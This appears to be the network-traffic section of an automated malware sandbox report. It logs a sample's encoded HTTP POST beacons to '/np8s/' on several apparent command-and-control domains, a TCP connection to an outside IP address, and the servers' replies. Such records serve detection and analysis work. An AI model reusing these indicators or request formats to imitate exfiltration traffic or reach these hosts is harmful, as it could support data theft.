47 55 6d 47 4f 4e 77 4d 69 54 6a 33 35 63 45 71 6f 67 4b 68 39 58 62 72 62 45 4f 6e 46 38 37 46 59 77 67 43 4d 37 69 62 5a 66 4b 48 44 4c 6f 73 7a 6b 57 69 44 43 62 33 66 42 4e 41 42 28 44 36 4a 69 37 6a 46 57 5f 44 61 71 2d 70 6d 54 68 61 31 66 66 62 32 44 51 32 38 71 44 39 6a 57 49 77 6e 7a 75 6e 49 70 7a 6c 58 38 48 71 67 63 77 39 52 4a 67 4b 6a 52 70 64 72 71 61 52 66 58 50 28 4b 64 64 5a 2d 52 4f 79 49 30 71 61 4b 70 49 65 6e 7e 2d 49 48 78 42 4f 5f 35 46 7e 48 41 6c 49 59 41 37 54 32 79 75 5a 76 35 71 63 71 6e 6c 33 76 5a 78 43 6e 72 33 33 67 4c 4a 61 46 43 52 48 4b 53 53 41 46 51 79 39 33 42 33 57 34 57 31 51 41 69 5a 70 56 34 56 54 62 79 55 33 73 73 64 6d 66 6f 58 55 48 77 76 33 56 35 41 65 76 59 4f 63 5f 4b 32 53 79 67 76 6d 77 50 48 4c 6a 56 62 50 55 42 55 67 49 67 36 30 74 34 59 77 68 56 6c 46 37 6b 47 30 33 74 34 46 43 78 43 38 43 47 6f 53 37 4d 70 79 46 4b 6d 39 4f 32 4c 36 51 46 58 52 4b 37 6d 4f 4f 34 47 76 34 68 45 74 76 67 5f 53 56 35 35 51 34 4c 72 32 63 73 36 35 70 7e 45 4d 51 44 4e 73 57
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.liveafunday.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.liveafunday.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.liveafunday.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 38 30 47 79 45 65 41 62 30 69 74 45 28 79 79 55 45 61 45 58 76 6b 68 67 42 43 35 79 79 46 73 6f 50 48 47 74 62 6c 7a 6d 6d 37 37 55 6b 31 37 59 76 46 31 4d 5a 61 4c 57 32 35 56 70 68 6b 79 6e 51 31 7a 50 39 59 5a 44 6a 45 64 7a 31 42 4e 58 54 68 6c 31 58 6f 72 41 43 70 30 6b 68 61 52 56 30 56 51 56 73 66 4d 56 61 75 4f 6a 45 36 4d 71 34 6f 67 69 55 31 59 59 72 4c 69 78 50 4e 39 6b 54 33 49 43 30 4e 6e 72 4c 31 61 36 6a 62 55 53 61 6e 70 6b 55 52 54 56 5a 6c 37 32 75 39 64 45 79 51 78 65 4a 31 46 65 79 58 4a 51 75 73 4b 4d 37 33 43 4a 45 31 47 48 42 63 44 36 45 67 78 69 68 52 6f 6d 44 4a 52 33 30 30 4d 65 58 31 38 77 32 30 5a 59 43 47 77 37 72 45 61 69 6a 58 41 44 71 76 58 61 77 30 6b 58 39 6b 35 68 79 5a 75 6f 6a 33 28 68 42 38 6f 6c 41 49 66 33 38 36 4b 32 57 48 48 4c 68 73 33 68 72 47 51 48 73 44 64 44 58 5f 4e 32 51 36 4b 5a 43 54 30 66 50 62 76 68 56 4f 48 4e 61 74 6d 63 32 62 28 44 54 34 53 47 58 7a 30 5f 69 65 77 6d 38 4c 7a 58 51 41 79 7a 66 72 4c 41 33 78 53 35 33 4c 67 4e 38 5a 63 78 44 6d 69 68 56 65 75 42 41 6f 7a 4d 52 33 78 4a 35 71 6c 6a 33 6b 36 45 4f 35 77 46 53 79 61 4a 6c 7a 34 4b 67 74 61 4f 50 37 79 59 35 49 35 6c 6d 5a 43 65 62 54 39 53 42 32 46 55 51 4c 77 4f 79 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
c2MH6DeP=80GyEeAb0itE(yyUEaEXvkhgBC5yyFsoPHGtblzmm77Uk17YvF1MZaLW25VphkynQ1zP9YZDjEdz1BNXThl1XorACp0khaRV0VQVsfMVauOjE6Mq4ogiU1YYrLixPN9kT3IC0NnrL1a6jbUSanpkURTVZl72u9dEyQxeJ1FeyXJQusKM73CJE1GHBcD6EgxihRomDJR300MeX18w20ZYCGw7rEaijXADqvXaw0kX9k5hyZuoj3(hB8olAIf386K2WHHLhs3hrGQHsDdDX_N2Q6KZCT0fPbvhVOHNatmc2b(DT4SGXz0_iewm8LzXQAyzfrLA3xS53LgN8ZcxDmihVeuBAozMR3xJ5qlj3k6EO5wFSyaJlz4KgtaOP7yY5I5lmZCebT9SB2FUQLwOyg).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.liveafunday.xyzConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.liveafunday.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.liveafunday.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 38 30 47 79 45 62 70 43 37 79 42 5a 6e 43 7e 33 51 49 45 44 37 46 78 69 4e 53 39 78 33 45 42 34 59 43 62 63 56 45 44 62 6e 2d 50 65 7a 57 50 31 6b 6d 46 69 5a 62 37 5f 36 71 78 74 72 55 4f 6b 51 31 37 78 39 59 56 44 67 45 31 6a 77 53 30 36 54 43 4e 30 56 49 72 38 42 70 30 48 6c 59 6c 34 30 56 63 37 73 66 45 46 5a 66 79 6a 47 66 49 71 36 72 49 58 61 31 59 61 31 62 79 74 4c 4e 78 44 54 33 77 61 30 49 66 72 4c 46 57 36 6a 34 4d 52 63 6c 42 72 54 42 54 55 53 46 36 79 67 64 59 33 79 51 31 38 4a 77 6c 65 79 68 78 51 68 59 47 4d 77 67 57 4b 64 56 47 34 46 63 44 4e 41 67 39 4a 68 52 6b 51 44 4c 39 4e 30 42 45 65 57 46 38 7a 7a 6e 70 68 46 52 73 57 34 55 47 5f 6a 58 4e 70 72 2d 4c 38 77 77 31 30 70 6d 77 58 73 4c 58 48 6a 31 7a 50 44 63 6f 68 5a 34 66 57 38 36 4b 57 57 48 48 70 68 74 6e 68 72 42 4d 48 74 67 31 44 41 75 4e 78 66 36 4b 51 4c 7a 31 4d 41 37 72 64 56 4f 50 64 61 70 71 36 32 71 37 44 53 5a 69 47 55 42 4d 38 33 4f 78 74 34 4c 79 42 61 67 79 47 66 72 4c 70 33 30 71 70 32 34 55 4e 36 4c 30 78 41 43 43 68 46 2d 75 42 5a 59 7a 4f 61 58 38 43 35 71 74 6e 33 68 7e 2d 4f 4b 63 46 52 6b 47 4a 72 78 41 4b 6a 64 61 4f 43 62 7a 74 32 59 73 71 6d 59 37 75 59 79 52 37 50 78 41 5f 61 62 68 4b 68 62 7a 67 7a 46 34 76 59 6b 54 56 54 79 42 50 59 55 64 4d 35 64 6c 5a 52 6c 37 45 43 64 34 6a 51 50 74 4c 53 58 42 4b 78 45 65 38 71 66 79 64 4e 69 38 72 70 44 35 54 33 66 79 56 4e 38 42 38 38 31 30 34 4c 30 30 5a 6e 66 65 6f 50 6f 79 66 63 72 37 65 4d 36 45 4d 56 5f 6b 68 71 58 32 36 6f 6b 7e 53 36 45 33 35 50 75 67 61 75 74 30 44 7a 
68 63 79 64 56 47 55 74 68 31 68 6a 35 4d 6e 47 41 65 44 6f 58 7e 58 58 74 6d 52 41 6b 49 36 46 63 55 62 33 55 39 78 34 67 78 74 67 77 70 73 6a 6b 52 5a 76 76 62 49 6d 68 4a 73 61 67 75 4f 4f 39 67 66 4f 39 67 58 69 38 64 47 39 4c 33 30 6f 5a 36 34 31 65 55 69 4e 58 53 4c 39 6e 72 6f 77 7a 78 32 6e 58 6f 37 42 44 6c 72 28 72 5a 52 6d 4d 67 74 77 72 77 6c 41 5f 75 6f 4d 5a 36 34 71 2d 78 32 70 43 78 4f 46 48 45 32 57 78 77 42 74 62 69 6d 4f 66 32 51 45 49 62 34 59 41 53 50 39 6d 30 6a 62 5f 67 33 36 51 4e 69 4a 4a 34 5a 4a 37 66 56 6b 35 4f 71 33 62 56 76 4e 68 6b 6c 57 71 6c 6f 32 43 62 4a 62 68 72 44 71 36 42 31 63 2d 73 55 78 44 30 49 33 4e 72 57 70 56 67 4d 36 68 31 4b 56 66 31 52 48 49 6a 53 71 78 64 63 73 31 56 61 41 58 4a 61 35 6f 4d 57 61 6c 59 76 37 53 77 6a 51 51 71 37 4c 68 6c 70 34 78 34 44 4c 45 30 73 50 49 67 70 4b 67 31 6f 4c 73 59 42 56 64 66 4a 65 2d 50 54 54 70 70 78 66 75 37 37 7e 42 4d 33 42 64 79 4b 6c 32 39 39 56 59 79 42 6b 6b 37 73 71 5f 50 61 4e 4a 5a 58 76 6c 70 6c 41 65 38 41 34 69
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.o7oiwlp.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.o7oiwlp.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 5a 67 43 72 46 35 79 32 45 73 4d 42 52 64 35 50 48 77 34 51 53 30 31 32 4d 78 36 45 42 48 64 32 74 45 33 38 37 67 51 35 7e 52 62 39 77 45 66 71 4d 37 35 4b 6d 57 7e 31 50 50 76 38 74 49 4a 47 57 49 36 43 68 35 41 49 72 70 43 79 42 52 5a 66 35 48 30 6f 57 77 43 41 32 34 38 66 59 6f 41 45 35 68 57 61 45 71 52 31 36 4f 62 5f 64 72 48 4c 41 39 4d 48 70 7a 57 41 6a 75 78 70 61 4d 38 6e 51 62 4d 32 72 6f 6b 4f 51 69 32 51 77 51 6a 47 79 65 64 62 55 79 45 42 53 6b 6a 76 7e 54 63 4c 30 63 78 30 6d 75 45 6a 28 6d 34 4c 73 73 71 4b 54 74 4d 4f 7e 76 72 48 44 32 4c 4d 41 5f 4e 76 43 4e 36 75 5a 33 37 54 69 35 71 34 39 64 4b 51 79 38 4a 61 28 52 35 78 36 73 41 37 72 79 49 71 50 37 35 48 4c 73 4d 6e 50 5a 76 72 48 66 72 32 57 51 74 64 47 59 7e 50 4a 6c 59 42 55 45 4a 62 70 4e 33 74 31 5f 50 30 30 45 42 69 36 4b 6e 56 77 7a 6a 73 35 49 6a 41 6d 44 34 43 71 79 62 71 79 31 53 35 4a 56 79 53 6b 46 70 77 78 70 53 65 79 68 5a 42 69 49 6d 30 28 5f 37 41 32 6c 4d 66 55 36 77 50 6c 4a 64 4e 32 74 69 59 50 30 4c 39 64 6a 6b 56 6f 41 7e 46 51 53 30 47 59 72 41 53 35 77 39 4f 55 58 75 47 63 37 79 45 46 47 28 4e 72 43 4b 62 79 38 4c 75 64 51 56 63 76 72 30 51 4e 50 52 72 62 58 32 66 69 4b 7e 71 69 57 73 65 28 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
c2MH6DeP=ZgCrF5y2EsMBRd5PHw4QS012Mx6EBHd2tE387gQ5~Rb9wEfqM75KmW~1PPv8tIJGWI6Ch5AIrpCyBRZf5H0oWwCA248fYoAE5hWaEqR16Ob_drHLA9MHpzWAjuxpaM8nQbM2rokOQi2QwQjGyedbUyEBSkjv~TcL0cx0muEj(m4LssqKTtMO~vrHD2LMA_NvCN6uZ37Ti5q49dKQy8Ja(R5x6sA7ryIqP75HLsMnPZvrHfr2WQtdGY~PJlYBUEJbpN3t1_P00EBi6KnVwzjs5IjAmD4Cqybqy1S5JVySkFpwxpSeyhZBiIm0(_7A2lMfU6wPlJdN2tiYP0L9djkVoA~FQS0GYrAS5w9OUXuGc7yEFG(NrCKby8LudQVcvr0QNPRrbX2fiK~qiWse(A).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.o7oiwlp.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.o7oiwlp.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.ratebill.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.ratebill.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ratebill.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: 
c2MH6DeP=BCkGHlEt(iAIsbyMCITLHu~O9kksE0VtOupkf0KSNVUNstDDWoDbHmNB~grUrhOJg6xqxCu8eBac8hToTeayT761DpxpDtOnqzTEoLdVhTr8pvEgPY~O9i8aj0h7(9mVUZZptGkIwEDZtE9IxBgA7_38lbMuAKgzgBLehUZNWWHoMQjmD_ZRrG5p(u~6JFCc2S9FdRJvv9b3rEiVNe(Ql8udA_mtr8rJ9cHLKJ8jx4USELpkXUb_sWr2nD89rGl0oMK3c8UduC6UEuBME4TzgZiOw9MzgQEfFQz4bM12UKm26geQJVDGxeYlufipNa231sW9NJTwoHxraOyl8Ir5pEzlqEvyECNlNA9whIoTHD~rN47J9M6_7E8lBJHn51INABmsJEUOjdLNcCn08g).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.ratebill.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.ratebill.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ratebill.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic TCP traffic: 192.168.2.3:49740 -> 91.193.75.133:6670
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:27:43 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8x-litespeed-tag: 440_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 27 May 2022 15:28:02 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: public,max-age=3600x-litespeed-tag: 440_HTTP.404,440_404,440_URL.249cf122f2d92b3e82f0723a2e93dc1c,440_x-litespeed-cache: misstransfer-encoding: chunkeddate: Fri, 27 May 2022 15:28:02 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 15:28:06 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-05-27T15:28:11.6850751Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 15:28:06 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-05-27T15:28:11.7635228Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 15:28:06 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 8X-Rate-Limit-Reset: 2022-05-27T15:28:11.6850751Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:28:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:28:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:28:12 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:28:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:28:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dWpu5jLHo3iwl%2BNHIxtOk6Gl3dlqRVGQK7IouOJIj49gbhGQ5GxsGHxI%2FVyVDWR29kgWy2teu0x56i%2FsyEVNujcDhylznP4VgqJSjBbXUXMW7RroHOiuzTy%2Bh020xx09"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 711fc87d28084065-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Ascii: 131<!doctype html><html><head><meta http-equiv="refresh" content="0;url=/" /><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title></title></head><body></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:28:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aYDNIrgnAgJHsp2BkArxa%2Fbw9L2rr8Y39iryxmsUNM9Wa0RihaqgBH9WjIx02N7auwbJtC68CY8ug7xM4ZGWRwwt1Aj3bMqa5EQh4Vu%2B%2BsVzL%2FCvIPje7MgZei4NJOfS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 711fc87cf80d0686-LHRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 May 2022 15:29:06 GMTContent-Type: text/htmlContent-Length: 291ETag: "628d16df-123"Via: 1.1 googleConnection: closeData Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:29:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:29:48 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:29:50 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:29:52 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8x-litespeed-tag: 440_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 27 May 2022 15:30:11 GMTserver: LiteSpeedData Raw: 32 66 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 b6 92 e8 67 bb ea fc 07 0c 5d 19 4b 09 49 91 d4 9b b2 9c 3d 99 3c 36 5b c9 9e 54 26 d9 5b b7 92 d4 14 44 42 12 67 28 92 87 84 2c 39 8e ef 6f bf d5 78 f0 25 50 2f 8f 93 d4 ce 24 95 58 24 81 ee 46 a3 d1 dd 00 1a 8d 9b 17 5f fe eb d5 4f ff f7 87 af d0 92 ae c2 db cb 1b f8 83 42 1c 2d a6 1a 89 8c 9f 5f 6b f0 8e 60 ff f6 f2 e2 66 45 28 46 de 12 a7 19 a1 53 ed e7 9f be 36 46 1a ea e4 5f 22 bc 22 53 ed 2e 20 9b 24 4e a9 86 bc 38 a2 24 a2 53 6d 13 f8 74 39 f5 c9 5d e0 11 83 3d e8 28 88 02 1a e0 d0 c8 3c 1c 92 a9 cd e0 70 04 0c cc 75 1a cf 62 9a 5d e7 40 ae 57 78 6b 04 2b bc 20 46 92 12 40 e2 86 38 5d 90 6b 20 e0 86 06 34 24 b7 3f e0 05 41 51 4c d1 3c 5e 47 3e 7a 79 35 72 6c 7b 82 be bf 47 5f 84 f1 e2 a6 c3 4b 5d de 84 41 f4 0e a5 24 9c 5e fb 51 06 e0 e6 84 7a cb 6b b4 4c c9 7c 7a dd e9 d0 25 99 91 8c de 05 fe 3c 4e 71 18 9a db fb df 39 9e 43 35 33 73 63 c6 e9 a2 56 58 c3 21 25 69 84 29 d1 10 bd 4f c8 54 c3 49 12 06 1e a6 41 1c 75 d2 2c fb 6c bb 0a 35 c4 c8 9b 6a 82 5c f4 32 c5 ff 5e c7 13 f4 35 21 be c6 69 d3 96 94 26 ae 9a c0 ce 9c 10 bf c3 f9 98 93 f9 34 cc af e2 d5 8a 44 34 3b 9a 04 4f 54 28 d3 92 79 69 90 d0 db cb 4d 10 f9 f1 c6 7c b3 49 c8 2a 7e 1b bc 26 94 06 d1 22 43 53 f4 a0 cd 70 46 7e 4e 43 cd 65 0d cc dc 5f 3b bf 76 04 2b 7f ed b0 4e cf 7e ed 78 71 4a 7e ed b0 ca bf 76 ec 9e 69 99 d6 af 9d a1 b3 1d 3a bf 76 34 5d 23 5b aa b9 9a 99 44 0b 4d d7 b2 bb c5 79 f0 b2 bb 05 83 96 dd 2d be e2 00 b3 3b 06 30 5e a7 1e d1 dc 07 cd 8b 23 0f 53 46 86 a0 97 91 ab 92 99 5f 3b 9b c4 08 22 2f 5c fb 24 fb b5 f3 36 63 2f 58 55 23 25 21 c1 19 31 57 41 64 be cd 3e bf 23 e9 74 60 5a da e3 e3 e4 b2 f3 e9 0b f4 d3 32 c8 d0 3c 08 09 0a 32 84 d7 34 36 16 24 22 29 a6 c4 47 9f 76 2e 5f cc d7 91 07 d2 d3 22 3a d6 69 fb e1 0e a7 28 